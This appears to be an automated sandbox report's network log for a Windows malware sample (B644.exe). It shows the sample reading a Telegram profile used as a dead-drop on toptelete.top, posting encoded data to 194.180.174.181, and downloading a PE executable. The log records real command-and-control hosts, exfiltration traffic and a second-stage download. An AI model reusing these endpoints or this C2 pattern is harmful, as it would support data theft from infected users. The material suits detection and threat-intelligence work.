65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          45192.168.2.749844172.67.160.4680C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:25.351454973 CEST10846OUTGET /agrybirdsgamerept HTTP/1.1
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Host: toptelete.top
                                                                                                                          Oct 29, 2021 17:07:25.571712971 CEST10847INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:25 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          set-cookie: stel_ssid=70c084432b04f116e9_14023040029138586655; expires=Sat, 30 Oct 2021 15:07:25 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                          pragma: no-cache
                                                                                                                          cache-control: no-store
                                                                                                                          strict-transport-security: max-age=35768000
                                                                                                                          access-control-allow-origin: *
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8aGoP03EFSpL2dqVU%2BL49372g0mIuY2w5mW85dCRxaPwu42DhHD9D6mD7SzG52rzgZfRQBL%2FhLh4yVlmCObnyb%2B8EFfGIm8DWxXEhnotgeoE%2B5lm%2F%2BHLBBuJdts2b2pi"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6a5d503b7b1a42e7-FRA
                                                                                                                          Data Raw: 31 31 66 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 65 6c 65 67 72 61 6d 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 32 31 33 37 37 71 38 39 65 6e 44 70 48 45 46 75 41 58 50 36 31 57 6c 58 70 73 6c 77 77 48 4b 6e 76 72 68 41 3d 61 62 2d 76 63 30 22 3e 0a 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e
                                                                                                                          Data Ascii: 11fd<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @agrybirdsgamerept</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="agrybirdsgamerept"><meta property="og:image" content="https://telegram.org/img/t_logo.png"><meta property="og:site_name" content="Telegram"><meta property="og:description" content="21377q89enDpHEFuAXP61WlXpslwwHKnvrhA=ab-vc0"><meta property="twitter:title" content="agrybirdsgamerept">
                                                                                                                          Oct 29, 2021 17:07:25.571767092 CEST10848INData Raw: 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 69 6d 67 2f 74 5f 6c 6f 67 6f 2e 70 6e 67 22 3e 0a 3c 6d 65
                                                                                                                          Data Ascii: <meta property="twitter:image" content="https://telegram.org/img/t_logo.png"><meta property="twitter:site" content="@Telegram"><meta property="al:ios:app_store_id" content="686449807"><meta property="al:ios:app_name" content="Telegram Mes
                                                                                                                          Oct 29, 2021 17:07:25.571799040 CEST10850INData Raw: 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 36 38 36 34 34 39 38 30 37 2c 20 61 70 70 2d 61 72 67
                                                                                                                          Data Ascii: ybirdsgamerept"><meta name="apple-itunes-app" content="app-id=686449807, app-argument: tg://resolve?domain=agrybirdsgamerept"> <link rel="shortcut icon" href="//telegram.org/favicon.ico?3" type="image/x-icon" /> <link href="https://f
                                                                                                                          Oct 29, 2021 17:07:25.571830988 CEST10851INData Raw: 61 20 63 6c 61 73 73 3d 22 74 67 6d 65 5f 61 63 74 69 6f 6e 5f 62 75 74 74 6f 6e 5f 6e 65 77 22 20 68 72 65 66 3d 22 74 67 3a 2f 2f 72 65 73 6f 6c 76 65 3f 64 6f 6d 61 69 6e 3d 61 67 72 79 62 69 72 64 73 67 61 6d 65 72 65 70 74 22 3e 56 69 65 77
                                                                                                                          Data Ascii: a class="tgme_action_button_new" href="tg://resolve?domain=agrybirdsgamerept">View in Telegram</a></div>... WEBOGRAM_BTN --><div class="tgme_page_action tgme_page_context_action"><div class="tgme_page_context_btn"><a class="tgme_action_but
                                                                                                                          Oct 29, 2021 17:07:25.571856976 CEST10851INData Raw: 20 3c 73 63 72 69 70 74 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 31 33 2e 31 6d 73 20 2d 2d 3e 0a 0d 0a
                                                                                                                          Data Ascii: <script></script> </body></html>... page generated in 13.1ms -->
                                                                                                                          Oct 29, 2021 17:07:25.571880102 CEST10851INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          46192.168.2.749845194.180.174.18180C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          Oct 29, 2021 17:07:25.634857893 CEST10852OUTPOST / HTTP/1.1
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 132
                                                                                                                          Host: 194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:25.634933949 CEST10852OUTData Raw: 6e 41 59 37 32 32 71 4d 51 4d 55 58 62 46 4a 4d 7a 43 6e 6a 6a 4c 37 78 5a 57 35 52 37 30 42 44 35 69 58 48 57 65 77 34 30 6f 71 6e 6f 75 4b 41 51 37 2f 63 63 61 50 6c 33 32 4d 52 7a 39 32 63 35 50 59 6e 44 52 65 44 58 64 71 42 43 4c 38 31 4c 79
                                                                                                                          Data Ascii: nAY722qMQMUXbFJMzCnjjL7xZW5R70BD5iXHWew40oqnouKAQ7/ccaPl32MRz92c5PYnDReDXdqBCL81LyhYQqT/QM513CGXt+E4oVPMQd4mVYJnYXBVLgoFdy4zdP011A0=
                                                                                                                          Oct 29, 2021 17:07:26.037539959 CEST10854INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:26 GMT
                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Data Raw: 32 34 61 38 0d 0a 68 52 6b 67 67 6a 6a 72 50 74 45 64 41 30 30 35 6a 51 47 69 34 37 6e 51 44 42 35 4c 68 51 55 4d 36 6d 61 2b 4b 50 63 74 74 74 36 55 74 65 2f 67 56 5a 4b 73 63 66 36 7a 36 79 55 32 30 38 43 41 67 4b 5a 2b 61 78 37 52 50 4d 37 4d 63 75 4e 4c 58 6d 46 65 51 4b 72 77 48 63 31 38 32 58 79 56 74 2b 46 73 6f 46 57 64 51 34 6b 6b 44 74 59 7a 4d 43 5a 56 66 51 39 55 4a 54 6b 7a 63 66 46 78 67 67 5a 6d 6c 65 63 52 6d 32 68 66 31 47 73 77 42 4b 2b 6e 75 66 77 49 32 77 34 59 45 33 47 55 57 68 37 76 74 58 4f 54 4d 69 61 7a 6f 52 71 46 42 74 45 53 73 79 51 52 52 42 31 48 51 30 67 51 71 59 52 31 6d 64 39 4c 30 4f 34 56 70 4d 6d 32 5a 77 2b 39 6c 59 53 38 33 54 57 39 61 63 56 58 74 56 78 63 70 77 4d 4f 31 6f 64 6c 46 52 66 62 38 39 36 48 33 54 69 56 61 37 41 2b 4d 32 37 76 77 64 78 4c 59 47 5a 2f 31 43 62 6a 54 65 59 4d 66 56 53 6c 43 58 30 4f 2f 4a 4c 59 64 57 63 66 44 75 50 4d 38 6d 41 76 75 32 46 70 48 2f 46 78 36 66 5a 36 32 50 7a 62 57 6a 6e 5a 47 72 39 2b 69 77 33 64 34 62 46 2f 67 6d 77 74 6c 4b 4a 64 30 50 59 75 38 6e 45 47 45 2b 73 31 36 46 33 4d 2f 35 72 6c 65 53 44 70 61 6d 62 43 38 44 77 58 37 47 43 37 71 65 37 5a 47 65 33 71 67 58 38 34 46 42 6e 77 39 41 34 59 79 51 6a 65 4f 48 53 6c 70 4c 4d 39 6a 4c 6f 75 73 6e 33 70 34 6a 7a 74 4c 35 46 41 38 79 66 73 6e 76 6e 52 79 4d 6a 34 4d 42 6a 50 6d 79 77 42 64 5a 38 6d 57 59 34 46 54 50 66 45 33 61 6b 31 74 61 61 79 61 33 38 37 78 74 58 51 4c 33 38 2f 4e 4d 35 4b 55 73 2f 59 68 64 79 32 4e 4d 53 33 4f 4d 55 74 4a 59 68 35 61 43 70 34 59 37 33 6e 30 54 44 4d 7a 79 6c 56 54 66 79 30 63 58 59 77 4b 46 74 7a 74 2b 2b 67 74 51 2b 45 2f 4a 33 57 6f 49 70 30 62 6f 4f 79 77 79 6a 48 6c 6a 54 49 4d 71 63 63 68 30 56 4b 56 62 73 4c 73 50 77 30 46 69 53 66 37 2f 62 2f 42 72 39 68 53 5a 68 35 6d 5a 44 52 6d 70 33 34 2f 33 47 76 77 39 61 42 71 6f 72 65 65 44 32 30 51 33 75 42 53 5a 33 44 32 70 36 39 4e 52 78 49 50 32 73 67 65 39 70 70 4e 63 52 5a 43 42 33 44 56 79 41 72 73 43 47 30 6c 4e 52 4d 31 65 66 61 75 58 2f 73 79 61 2f 63 70 63 7a 54 70 77 71 4a 30 34 4f 5a 59 47 30 77 69 75 6f 4f 51 42 52 71 53 30 55 62 74 78 37 38 2b 4d 42 6f 49 63 79 41 47 55 45 57 31 41 61 5a 6f 65 76 45 4b 67 38 68 4d 55 57 6b 4f 54 52 2b 32 55 41 74 6c 46 37 4d 4a 2f 2f 6b 38 48 67 6c 74 70 4b 4c 79 76 68 63 4d 32 6d 5a 2f 51 54 4d 53 58 58 38 65 74 59 79 56 41 4b 72 2b 48 69 65 41 30 6a 77 6e 66 51 30 73 6f 38 6d 41 74 55 4d 74 72 6b 68 6d 4d 4e 76 6d 6c 47 76 64 77 43 5a 31 6d 62 34 50 41 70 53 38 42 50 61 44 68 39 75 63 38 4f 41 6e 59 49 48 71 30 35 42 72 64 33 38 44 70 4d 79 47 46 33 4a 37 64 4b 76 56 56 78 63 39 6b 47 63 2b 4d 31 68 74 56 78 36 51 56 7a 6d 69 77 65 58 4e 58 50 30 77 53 46 77 2b 34 36 79 69 30 33 36 30 62 6a 71 49 73 30 64 4b 39 49 4e 7a 6d 4f 73 41 5a 47 77 38 33 67 44 43 53 33 41 42 62 32 6e 53 65 42 4a 71 4c 41 43 73 68 41 36 73 4b 2f 79 46 32 56 44 6b 6a 42 75 57 49 30 6a 4e 67 32 75 33 4d 39 57 6a 53 73 46 39 4b 71 2b 6b 69 79 66 2b 5a 47 5a 4f 52 56 43 6d 46 4c 75 55 76 64 6a 78 46 46 34 48 58 55 42 6f 51 71 6f 6f 31 39 6a 78 31 51 4e 6f 56 37 74 74 76 72 57 5a 52 66 4e 54 39 4d 74 4e 56 52 41 63 47 68 5a 46 79 31 6a 7a 7a 2f 4b 48 79 42 58 77 63 55 35 37 6a 34 4c 6d 65 35 51 63 6e 30 74 31 66 63 49 30 59 34 2b 59 4f 4b 6a 56 31 47 59 30 67 50 73 35 67 6e 4b 74 61 30 72 6d 6f 54 61 71 57 69 34 34 44 77 43 77 42 6a 4a 63 33 52 69 46 78 30 41 68 52
                                                                                                                          Data Ascii: 24a8hRkggjjrPtEdA005jQGi47nQDB5LhQUM6ma+KPcttt6Ute/gVZKscf6z6yU208CAgKZ+ax7RPM7McuNLXmFeQKrwHc182XyVt+FsoFWdQ4kkDtYzMCZVfQ9UJTkzcfFxggZmlecRm2hf1GswBK+nufwI2w4YE3GUWh7vtXOTMiazoRqFBtESsyQRRB1HQ0gQqYR1md9L0O4VpMm2Zw+9lYS83TW9acVXtVxcpwMO1odlFRfb896H3TiVa7A+M27vwdxLYGZ/1CbjTeYMfVSlCX0O/JLYdWcfDuPM8mAvu2FpH/Fx6fZ62PzbWjnZGr9+iw3d4bF/gmwtlKJd0PYu8nEGE+s16F3M/5rleSDpambC8DwX7GC7qe7ZGe3qgX84FBnw9A4YyQjeOHSlpLM9jLousn3p4jztL5FA8yfsnvnRyMj4MBjPmywBdZ8mWY4FTPfE3ak1taaya387xtXQL38/NM5KUs/Yhdy2NMS3OMUtJYh5aCp4Y73n0TDMzylVTfy0cXYwKFtzt++gtQ+E/J3WoIp0boOywyjHljTIMqcch0VKVbsLsPw0FiSf7/b/Br9hSZh5mZDRmp34/3Gvw9aBqoreeD20Q3uBSZ3D2p69NRxIP2sge9ppNcRZCB3DVyArsCG0lNRM1efauX/sya/cpczTpwqJ04OZYG0wiuoOQBRqS0Ubtx78+MBoIcyAGUEW1AaZoevEKg8hMUWkOTR+2UAtlF7MJ//k8HgltpKLyvhcM2mZ/QTMSXX8etYyVAKr+HieA0jwnfQ0so8mAtUMtrkhmMNvmlGvdwCZ1mb4PApS8BPaDh9uc8OAnYIHq05Brd38DpMyGF3J7dKvVVxc9kGc+M1htVx6QVzmiweXNXP0wSFw+46yi0360bjqIs0dK9INzmOsAZGw83gDCS3ABb2nSeBJqLACshA6sK/yF2VDkjBuWI0jNg2u3M9WjSsF9Kq+kiyf+ZGZORVCmFLuUvdjxFF4HXUBoQqoo19jx1QNoV7ttvrWZRfNT9MtNVRAcGhZFy1jzz/KHyBXwcU57j4Lme5Qcn0t1fcI0Y4+YOKjV1GY0gPs5gnKta0rmoTaqWi44DwCwBjJc3RiFx0AhR
                                                                                                                          Oct 29, 2021 17:07:26.037580013 CEST10855INData Raw: 47 2f 31 4a 47 56 6c 44 75 41 6b 5a 4f 63 4b 76 67 37 64 63 35 52 59 70 4d 4d 4b 6d 59 37 4b 70 2b 70 64 75 50 63 55 68 59 4c 43 2b 72 36 36 38 36 63 38 59 53 41 32 70 46 44 74 4c 73 43 7a 49 55 68 35 66 52 47 5a 6e 6b 48 79 59 46 39 6f 59 52 68
                                                                                                                          Data Ascii: G/1JGVlDuAkZOcKvg7dc5RYpMMKmY7Kp+pduPcUhYLC+r6686c8YSA2pFDtLsCzIUh5fRGZnkHyYF9oYRhYhbKvDvCW67aZokOR5JtuWACQUr8xs9q1e3Bj1G02t4JM3IQAg4yxxV0qIyvXwm+nGK2/DlBCD6uvUs4a6fwx/eTLZmNX+XdadcnGe958Wpx/Bj92JgNpjR0zTP7rW/z+1xuGX+EZunYJG/TX1l1JqheL3kcxSRkL
                                                                                                                          Oct 29, 2021 17:07:26.037606955 CEST10856INData Raw: 47 71 41 33 78 78 33 76 73 6d 6b 64 36 56 4c 76 64 56 72 52 53 68 4f 39 59 61 74 65 2b 6e 4d 75 44 51 56 44 42 5a 7a 5a 4a 47 6f 43 6e 76 51 44 39 51 2b 53 4b 58 47 44 32 78 47 6b 52 4b 64 7a 38 36 41 79 73 7a 70 58 30 62 38 4b 52 31 62 6a 56 65
                                                                                                                          Data Ascii: GqA3xx3vsmkd6VLvdVrRShO9Yate+nMuDQVDBZzZJGoCnvQD9Q+SKXGD2xGkRKdz86AyszpX0b8KR1bjVeqnUsfJnV6JNlUpMAfLy1j191eVh4GQsjdqHoZn8aCJt7Xa3koRCB9pHJhpvUAQzoir0/TyGHEVfRGVj3aWMWNQoBobcefMO1IOT/pgnyKaAopGUOQZhEtVovuCMwBfyCkCjecOVy9SKIFBfvJJJKSsi/alRcFMegk
                                                                                                                          Oct 29, 2021 17:07:26.037635088 CEST10858INData Raw: 6d 36 64 2f 70 47 55 2b 31 31 52 35 34 34 41 43 35 62 5a 74 36 59 42 4d 52 30 43 31 36 76 6e 61 4d 68 45 57 6f 7a 57 5a 51 72 71 37 46 7a 4e 74 32 72 6c 42 53 59 70 38 4e 48 4c 66 4d 37 50 43 6c 47 71 52 58 55 47 31 66 54 30 33 62 59 5a 53 79 65
                                                                                                                          Data Ascii: m6d/pGU+11R544AC5bZt6YBMR0C16vnaMhEWozWZQrq7FzNt2rlBSYp8NHLfM7PClGqRXUG1fT03bYZSyegS3GgqJhdV9zp2CPUXShl3z7fO2JdGgXNLRMXRh/Nfiv6ILEv+XsGaEW5ps0VRhmxSJ/VEKZJIbFfWmCmK99zDsGgLdct3AvAkTCAp4GVrsbHlav1VvlypD/V06pCPYUcUsxczv+WNEZ7wI41H98ATWDIIIOVXfec
                                                                                                                          Oct 29, 2021 17:07:26.037662029 CEST10859INData Raw: 51 75 33 4f 37 70 36 36 65 51 53 35 2b 4c 34 5a 6f 31 37 35 39 45 4c 65 68 5a 56 76 6d 71 77 61 30 4b 73 79 58 6c 59 76 42 42 43 51 35 72 45 48 68 52 7a 4e 51 61 4d 35 52 6e 58 2b 52 66 39 41 30 6b 52 6f 55 61 30 44 66 35 55 56 76 54 62 35 4c 71
                                                                                                                          Data Ascii: Qu3O7p66eQS5+L4Zo1759ELehZVvmqwa0KsyXlYvBBCQ5rEHhRzNQaM5RnX+Rf9A0kRoUa0Df5UVvTb5Lqbd2rcCnbCNM9i8Q3QwFUq2gGEndWC8ph7Ctr/00FZuh0cceq7enT+xsOkAeZ+QiM815p8F7XTBqfHXJjN7zq/MSCAZcU7dQCxKHskFy49Vv9YBqEFGKq2NROJKca86VjTu3NX5D/NzPYbR8SjpcdiypatmYjfGoli
                                                                                                                          Oct 29, 2021 17:07:26.037692070 CEST10861INData Raw: 63 37 4d 34 33 53 6d 44 4e 57 4e 54 46 69 65 35 4c 33 7a 5a 53 6c 75 45 44 66 5a 53 34 4f 41 4a 33 6f 2f 57 63 52 6c 47 4b 54 59 38 44 4b 54 5a 45 50 30 70 43 6d 77 70 67 61 65 6e 30 43 37 32 56 52 48 32 43 5a 76 52 53 68 32 35 76 59 6d 58 39 58
                                                                                                                          Data Ascii: c7M43SmDNWNTFie5L3zZSluEDfZS4OAJ3o/WcRlGKTY8DKTZEP0pCmwpgaen0C72VRH2CZvRSh25vYmX9X+VCJVJFaMc0R4+ydp6hYmqfPc90hAR0996C1mN7S8XHGQUUmQeV2hCa9UqrM0PgafYRDLJZs1TSq1Ev7Zvs+ntgIbyalDOXghGrVwcoC3WKEHtCZhOQLc/Dcm18BDeJJkL6TcYDIPxFNabcBmeS4vuhbiIw3CAL9r
                                                                                                                          Oct 29, 2021 17:07:26.037722111 CEST10862INData Raw: 70 2f 72 34 6c 39 59 4c 51 30 6f 2b 4c 68 39 31 77 4f 46 59 41 63 77 62 56 79 6d 46 64 57 54 72 30 71 66 33 2b 41 41 69 44 78 63 50 56 48 34 4b 72 6e 5a 66 70 61 41 46 34 32 61 53 51 72 54 36 75 55 45 70 45 4d 32 37 65 6c 33 50 44 6a 57 48 4c 5a
                                                                                                                          Data Ascii: p/r4l9YLQ0o+Lh91wOFYAcwbVymFdWTr0qf3+AAiDxcPVH4KrnZfpaAF42aSQrT6uUEpEM27el3PDjWHLZpNvtH1NXtz4w45NwTzk/pn0BrEbDGr+ASz/CTx9cs49eMYaeeaX/xQTL4uHFI2Ua5AakHDFJjzxENjFd8LLiwfhqL6OB4/Ee9lb37+V0xDwn+h/AkKpL5FHObiCWY59J3/m4r70GvGpVHWFHKJlNVCVf3dudLFwMt
                                                                                                                          Oct 29, 2021 17:07:26.037744045 CEST10862INData Raw: 4f 37 68 55 78 74 6d 5a 4e 4a 37 36 4a 49 56 47 75 76 30 78 47 79 70 65 4a 4f 73 67 4d 56 42 70 68 36 6e 6c 35 75 54 39 66 42 6f 4a 49 72 78 65 75 33 61 34 59 54 59 46 38 4e 63 34 69 71 71 4d 58 70 6c 6f 4e 5a 4b 43 6a 65 50 56 77 4e 54 71 37 72
                                                                                                                          Data Ascii: O7hUxtmZNJ76JIVGuv0xGypeJOsgMVBph6nl5uT9fBoJIrxeu3a4YTYF8Nc4iqqMXploNZKCjePVwNTq7rYfp+4KPrrYIrHzkmvFsE/rk9shnO8ENkXEXLYky+T+bau946T4PDMLiS1lrYbFgJ9qhe/but45vio3uA+13SN1diqrMhg8HNi4o/YixzAXA97f20cX7EXzI8XtHJzuo5hZBRQUTNrsBG1JYqajhUgVSOKDxSsQ==
                                                                                                                          Oct 29, 2021 17:07:26.037765026 CEST10862INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0
                                                                                                                          Oct 29, 2021 17:07:26.129653931 CEST10863OUTGET //l/f/9Z2CynwB3dP17SpzOnMI/1a86e602d0d2d72a354901c42f4d11f8f79e44b1 HTTP/1.1
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Pragma: no-cache
                                                                                                                          Host: 194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.390692949 CEST10864INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 29 Oct 2021 15:07:26 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 916735
                                                                                                                          Connection: keep-alive
                                                                                                                          Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
                                                                                                                          ETag: "612fa893-dfcff"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c 00 00 04 00 00 00 0c 0c 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata |@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92
